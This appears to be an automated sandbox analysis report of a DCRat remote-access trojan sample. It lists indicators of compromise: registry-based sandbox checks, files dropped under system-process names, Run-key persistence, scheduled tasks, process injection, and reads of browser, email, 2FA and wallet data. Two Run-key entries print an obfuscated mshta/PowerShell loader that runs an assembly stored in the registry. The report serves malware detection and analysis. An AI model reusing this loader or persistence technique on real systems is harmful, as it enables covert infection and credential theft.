dcrat | 8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca

System Information Discovery

Processes:

Result_protected.exeInstall.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Result_protected.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Result_protected.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Checks computer location settings 2 TTPs 14 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exeInstall.exeETuSLYkVQqOjTT_usPKsVG0_.exearnatic_6.exehO5xKfTb0uXbbkS86n6An9zN.exe5NhVWerLeg2JkPgGASqWBTL4.exesetup_installer.exe8zeYyAhCLyy4MXuHDcnSZuq6.exe5RLR8rS_aMkp6xiTBY96V6aV.exe8zeYyAhCLyy4MXuHDcnSZuq6.exeGlMzB0cjitEHTuadmoJgQMmB.exeAeDLshJf0BYumx9Wg7E57LU8.exe3rukoxtBvGYzOvS6XcqPmx7G.exeResult_protected.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	ETuSLYkVQqOjTT_usPKsVG0_.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	arnatic_6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	hO5xKfTb0uXbbkS86n6An9zN.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	5NhVWerLeg2JkPgGASqWBTL4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	setup_installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	8zeYyAhCLyy4MXuHDcnSZuq6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	5RLR8rS_aMkp6xiTBY96V6aV.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	8zeYyAhCLyy4MXuHDcnSZuq6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	GlMzB0cjitEHTuadmoJgQMmB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	AeDLshJf0BYumx9Wg7E57LU8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	3rukoxtBvGYzOvS6XcqPmx7G.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Result_protected.exe

Loads dropped DLL 60 IoCs

Processes:

setup_install.exearnatic_2.exerUNdlL32.eXeZcZKv3wUd95iiqEdR8N8GIp7.exeTovKtHieW7V9aCT7Dk2QoIn9.exePPjZFTHQLVGLf4MI9ZI7vFA6.execmd.exe5NhVWerLeg2JkPgGASqWBTL4.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe

pid	process
3532	setup_install.exe
3532	setup_install.exe
3532	setup_install.exe
3532	setup_install.exe
3532	setup_install.exe
3532	setup_install.exe
1660	arnatic_2.exe
1060	rUNdlL32.eXe
3444	ZcZKv3wUd95iiqEdR8N8GIp7.exe
3444	ZcZKv3wUd95iiqEdR8N8GIp7.exe
4140	TovKtHieW7V9aCT7Dk2QoIn9.exe
4140	TovKtHieW7V9aCT7Dk2QoIn9.exe
4140	TovKtHieW7V9aCT7Dk2QoIn9.exe
3444	ZcZKv3wUd95iiqEdR8N8GIp7.exe
3444	ZcZKv3wUd95iiqEdR8N8GIp7.exe
4140	TovKtHieW7V9aCT7Dk2QoIn9.exe
3444	ZcZKv3wUd95iiqEdR8N8GIp7.exe
3444	ZcZKv3wUd95iiqEdR8N8GIp7.exe
4140	TovKtHieW7V9aCT7Dk2QoIn9.exe
4140	TovKtHieW7V9aCT7Dk2QoIn9.exe
3444	ZcZKv3wUd95iiqEdR8N8GIp7.exe
4140	TovKtHieW7V9aCT7Dk2QoIn9.exe
4140	TovKtHieW7V9aCT7Dk2QoIn9.exe
3444	ZcZKv3wUd95iiqEdR8N8GIp7.exe
3444	ZcZKv3wUd95iiqEdR8N8GIp7.exe
4140	TovKtHieW7V9aCT7Dk2QoIn9.exe
4140	TovKtHieW7V9aCT7Dk2QoIn9.exe
3444	ZcZKv3wUd95iiqEdR8N8GIp7.exe
1332	PPjZFTHQLVGLf4MI9ZI7vFA6.exe
1332	PPjZFTHQLVGLf4MI9ZI7vFA6.exe
1332	PPjZFTHQLVGLf4MI9ZI7vFA6.exe
1332	PPjZFTHQLVGLf4MI9ZI7vFA6.exe
1332	PPjZFTHQLVGLf4MI9ZI7vFA6.exe
1332	PPjZFTHQLVGLf4MI9ZI7vFA6.exe
1332	PPjZFTHQLVGLf4MI9ZI7vFA6.exe
1332	PPjZFTHQLVGLf4MI9ZI7vFA6.exe
1332	PPjZFTHQLVGLf4MI9ZI7vFA6.exe
1332	PPjZFTHQLVGLf4MI9ZI7vFA6.exe
3376	cmd.exe
3376	cmd.exe
3376	cmd.exe
3376	cmd.exe
3376	cmd.exe
3376	cmd.exe
3376	cmd.exe
3376	cmd.exe
3376	cmd.exe
3376	cmd.exe
1328	5NhVWerLeg2JkPgGASqWBTL4.exe
1328	5NhVWerLeg2JkPgGASqWBTL4.exe
5880	7z.exe
5508	7z.exe
5928	7z.exe
3404	7z.exe
1580	7z.exe
1060	7z.exe
3796	7z.exe
2560	7z.exe
620	7z.exe
316	7z.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

4236 takeown.exe
5940 icacls.exe
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
4236	takeown.exe
5940	icacls.exe

Adds Run key to start application 2 TTPs 18 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

8zeYyAhCLyy4MXuHDcnSZuq6.exeETuSLYkVQqOjTT_usPKsVG0_.exepowershell.exe8zeYyAhCLyy4MXuHDcnSZuq6.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WaaSMedicAgent = "\"C:\\Documents and Settings\\WaaSMedicAgent.exe\""	8zeYyAhCLyy4MXuHDcnSZuq6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Windows\\System32\\Microsoft.Uev.Office2013CustomActions\\dwm.exe\""	8zeYyAhCLyy4MXuHDcnSZuq6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Mzqdjnr = "\"C:\\Users\\Admin\\AppData\\Roaming\\Lmeurft\\Mzqdjnr.exe\""	ETuSLYkVQqOjTT_usPKsVG0_.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FaxOptions = "mshta vbscript:(CreateObject(\"WS\"+\"C\"+\"rI\"+\"Pt.ShEll\")).Run(\"powershell [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\\Microsoft\\Fax').GetValue('Drivers')).EntryPoint.Invoke(0,@())\",0)(window.close)"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\PerfLogs\\smss.exe\""	8zeYyAhCLyy4MXuHDcnSZuq6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\5RLR8rS_aMkp6xiTBY96V6aV = "\"C:\\Users\\Admin\\Documents\\These\\5RLR8rS_aMkp6xiTBY96V6aV.exe\""	8zeYyAhCLyy4MXuHDcnSZuq6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Windows\\System32\\dpnathlp\\winlogon.exe\""	8zeYyAhCLyy4MXuHDcnSZuq6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64\\OfficeClickToRun.exe\""	8zeYyAhCLyy4MXuHDcnSZuq6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\System32\\docprop\\RuntimeBroker.exe\""	8zeYyAhCLyy4MXuHDcnSZuq6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\System32\\unimdmat\\RuntimeBroker.exe\""	8zeYyAhCLyy4MXuHDcnSZuq6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ETuSLYkVQqOjTT_usPKsVG0_ = "\"C:\\Users\\Admin\\Documents\\Mh9GBYaC5IGIHnRPtOgGO9qd\\ETuSLYkVQqOjTT_usPKsVG0_.exe\""	8zeYyAhCLyy4MXuHDcnSZuq6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Windows\\System32\\runonce\\dwm.exe\""	8zeYyAhCLyy4MXuHDcnSZuq6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Windows\\System32\\comuid\\fontdrvhost.exe\""	8zeYyAhCLyy4MXuHDcnSZuq6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Windows\\System32\\WMADMOE\\lsass.exe\""	8zeYyAhCLyy4MXuHDcnSZuq6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\arnatic_7 = "\"C:\\Documents and Settings\\arnatic_7.exe\""	8zeYyAhCLyy4MXuHDcnSZuq6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\odt\\services.exe\""	8zeYyAhCLyy4MXuHDcnSZuq6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta vbscript:(CreateObject(\"WSCrIPt.ShEll\")).Run(\"powershell [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\\\\Microsoft\\\\SkyDrive').GetValue('Drivers')).EntryPoint.Invoke(0,@())\",0)(window.close)"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\SysWOW64\\sv-SE\\dllhost.exe\""	8zeYyAhCLyy4MXuHDcnSZuq6.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

Result_protected.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Result_protected.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

204 ipinfo.io
211 ipinfo.io
212 ipinfo.io
352 ip-api.com
12 ip-api.com
30 ipinfo.io
31 ipinfo.io
197 ipinfo.io

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Result_protected.exe

flow	ioc
204	ipinfo.io
211	ipinfo.io
212	ipinfo.io
352	ip-api.com
12	ip-api.com
30	ipinfo.io
31	ipinfo.io
197	ipinfo.io

Drops file in System32 directory 17 IoCs

Processes:

8zeYyAhCLyy4MXuHDcnSZuq6.exe8zeYyAhCLyy4MXuHDcnSZuq6.exeInstall.exe

description	ioc	process
File created	C:\Windows\SysWOW64\comuid\5b884080fd4f94	8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created	C:\Windows\SysWOW64\dpnathlp\winlogon.exe	8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created	C:\Windows\SysWOW64\unimdmat\RuntimeBroker.exe	8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created	C:\Windows\SysWOW64\runonce\dwm.exe	8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created	C:\Windows\SysWOW64\docprop\9e8d7a4ca61bd9	8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File created	C:\Windows\SysWOW64\WMADMOE\lsass.exe	8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created	C:\Windows\SysWOW64\Microsoft.Uev.Office2013CustomActions\dwm.exe	8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created	C:\Windows\SysWOW64\Microsoft.Uev.Office2013CustomActions\6cb0b6c459d5d3	8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created	C:\Windows\SysWOW64\sv-SE\dllhost.exe	8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created	C:\Windows\SysWOW64\sv-SE\5940a34987c991	8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created	C:\Windows\SysWOW64\runonce\6cb0b6c459d5d3	8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created	C:\Windows\SysWOW64\dpnathlp\cc11b995f2a76d	8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created	C:\Windows\SysWOW64\unimdmat\9e8d7a4ca61bd9	8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created	C:\Windows\SysWOW64\comuid\fontdrvhost.exe	8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created	C:\Windows\SysWOW64\docprop\RuntimeBroker.exe	8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created	C:\Windows\SysWOW64\WMADMOE\6203df4a6bafc7	8zeYyAhCLyy4MXuHDcnSZuq6.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs

Processes:

8zeYyAhCLyy4MXuHDcnSZuq6.exe8zeYyAhCLyy4MXuHDcnSZuq6.exeWaaSMedicAgent.exeZxU30FwtSCAQFKpXqBqFaTKQ.exe

pid	process
2072	8zeYyAhCLyy4MXuHDcnSZuq6.exe
4548	8zeYyAhCLyy4MXuHDcnSZuq6.exe
5080	WaaSMedicAgent.exe
1600	ZxU30FwtSCAQFKpXqBqFaTKQ.exe
5080	WaaSMedicAgent.exe
5080	WaaSMedicAgent.exe
5080	WaaSMedicAgent.exe
5080	WaaSMedicAgent.exe
5080	WaaSMedicAgent.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

arnatic_7.exeConhost.exeETuSLYkVQqOjTT_usPKsVG0_.exepowershell.exe

description	pid	process	target process
PID 2940 set thread context of 3192	2940	arnatic_7.exe	arnatic_7.exe
PID 1420 set thread context of 2548	1420		svchost.exe
PID 1612 set thread context of 5824	1612	Conhost.exe	KUxPDM3fT73jHaCqN6rtwNRj.exe
PID 4200 set thread context of 2120	4200	ETuSLYkVQqOjTT_usPKsVG0_.exe	reg.exe
PID 5344 set thread context of 2192	5344	powershell.exe	RegSvcs.exe

Drops file in Program Files directory 3 IoCs

Processes:

8zeYyAhCLyy4MXuHDcnSZuq6.exe

description	ioc	process
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2R64\OfficeClickToRun.exe	8zeYyAhCLyy4MXuHDcnSZuq6.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2R64\OfficeClickToRun.exe	8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2R64\e6c9b481da804f	8zeYyAhCLyy4MXuHDcnSZuq6.exe

Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job schtasks.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job	schtasks.exe

Program crash 23 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2084	1060	WerFault.exe	rUNdlL32.eXe
3000	3528	WerFault.exe	arnatic_1.exe
4688	1368	WerFault.exe	4_yza4q88bogYk_cF59XJjyz.exe
4332	4252	WerFault.exe	5RLR8rS_aMkp6xiTBY96V6aV.exe
4656	1420	WerFault.exe	ezokegez.exe
3060	1368	WerFault.exe	4_yza4q88bogYk_cF59XJjyz.exe
4840	5044	WerFault.exe	yAQm8Ifhb_rMkM7EhIDqbE9y.exe
5144	1368	WerFault.exe	4_yza4q88bogYk_cF59XJjyz.exe
4944	4900	WerFault.exe	CPH9q07r6cXvJsVI_KM1RiOL.exe
5100	5004	WerFault.exe	1JL6JbXANF8tluJUl1I2mYPT.exe
5860	5044	WerFault.exe	yAQm8Ifhb_rMkM7EhIDqbE9y.exe
6120	4900	WerFault.exe	CPH9q07r6cXvJsVI_KM1RiOL.exe
972	1368	WerFault.exe	4_yza4q88bogYk_cF59XJjyz.exe
5396	5004	WerFault.exe	1JL6JbXANF8tluJUl1I2mYPT.exe
5568	4148	WerFault.exe	hO5xKfTb0uXbbkS86n6An9zN.exe
3700	1332	WerFault.exe	PPjZFTHQLVGLf4MI9ZI7vFA6.exe
5156	1368	WerFault.exe	4_yza4q88bogYk_cF59XJjyz.exe
5872	4148	WerFault.exe	hO5xKfTb0uXbbkS86n6An9zN.exe
5052	4148	WerFault.exe	hO5xKfTb0uXbbkS86n6An9zN.exe
1612	1332	WerFault.exe	PPjZFTHQLVGLf4MI9ZI7vFA6.exe
4572	4148	WerFault.exe	hO5xKfTb0uXbbkS86n6An9zN.exe
6040	5884	WerFault.exe	svchost.exe
5976	5788	WerFault.exe	conhost.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

AFC2.exearnatic_2.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AFC2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AFC2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	arnatic_2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	arnatic_2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	arnatic_2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AFC2.exe

Checks processor information in registry 2 TTPs 33 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

4_yza4q88bogYk_cF59XJjyz.exeTovKtHieW7V9aCT7Dk2QoIn9.exePPjZFTHQLVGLf4MI9ZI7vFA6.exe5NhVWerLeg2JkPgGASqWBTL4.exed3381037-203a-43e3-9362-b9ca4e152f72.execmd.exeZcZKv3wUd95iiqEdR8N8GIp7.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision	4_yza4q88bogYk_cF59XJjyz.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	TovKtHieW7V9aCT7Dk2QoIn9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	PPjZFTHQLVGLf4MI9ZI7vFA6.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	4_yza4q88bogYk_cF59XJjyz.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision	4_yza4q88bogYk_cF59XJjyz.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	4_yza4q88bogYk_cF59XJjyz.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision	4_yza4q88bogYk_cF59XJjyz.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	4_yza4q88bogYk_cF59XJjyz.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	TovKtHieW7V9aCT7Dk2QoIn9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	5NhVWerLeg2JkPgGASqWBTL4.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	4_yza4q88bogYk_cF59XJjyz.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	4_yza4q88bogYk_cF59XJjyz.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	4_yza4q88bogYk_cF59XJjyz.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	4_yza4q88bogYk_cF59XJjyz.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	d3381037-203a-43e3-9362-b9ca4e152f72.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data	4_yza4q88bogYk_cF59XJjyz.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	4_yza4q88bogYk_cF59XJjyz.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	4_yza4q88bogYk_cF59XJjyz.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	4_yza4q88bogYk_cF59XJjyz.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet	4_yza4q88bogYk_cF59XJjyz.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status	4_yza4q88bogYk_cF59XJjyz.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	cmd.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	4_yza4q88bogYk_cF59XJjyz.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ZcZKv3wUd95iiqEdR8N8GIp7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	cmd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	d3381037-203a-43e3-9362-b9ca4e152f72.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	4_yza4q88bogYk_cF59XJjyz.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status	4_yza4q88bogYk_cF59XJjyz.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ZcZKv3wUd95iiqEdR8N8GIp7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	4_yza4q88bogYk_cF59XJjyz.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information	4_yza4q88bogYk_cF59XJjyz.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	5NhVWerLeg2JkPgGASqWBTL4.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	PPjZFTHQLVGLf4MI9ZI7vFA6.exe

Creates scheduled task(s) 1 TTPs 22 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
4956	schtasks.exe
5224	schtasks.exe
4488	schtasks.exe
4548	schtasks.exe
4592	schtasks.exe
4712	schtasks.exe
5016	schtasks.exe
4516	schtasks.exe
4468	schtasks.exe
4520	schtasks.exe
4948	schtasks.exe
5000	schtasks.exe
4984	schtasks.exe
4568	schtasks.exe
4904	schtasks.exe
5104	schtasks.exe
5384	schtasks.exe
3176	schtasks.exe
4788	schtasks.exe
6076	schtasks.exe
1448	schtasks.exe
5392	schtasks.exe

Delays execution with timeout.exe 5 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

5056 timeout.exe
5160 timeout.exe
4544 timeout.exe
4256 timeout.exe
1332 timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

1404 tasklist.exe
5064 tasklist.exe

pid	process
5056	timeout.exe
5160	timeout.exe
4544	timeout.exe
4256	timeout.exe
1332	timeout.exe

pid	process
1404	tasklist.exe
5064	tasklist.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

5580 taskkill.exe
6008 taskkill.exe
3880 taskkill.exe

pid	process
5580	taskkill.exe
6008	taskkill.exe
3880	taskkill.exe

Modifies registry class 2 IoCs

Processes:

8zeYyAhCLyy4MXuHDcnSZuq6.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	8zeYyAhCLyy4MXuHDcnSZuq6.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings	8zeYyAhCLyy4MXuHDcnSZuq6.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

arnatic_1.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	arnatic_1.exe
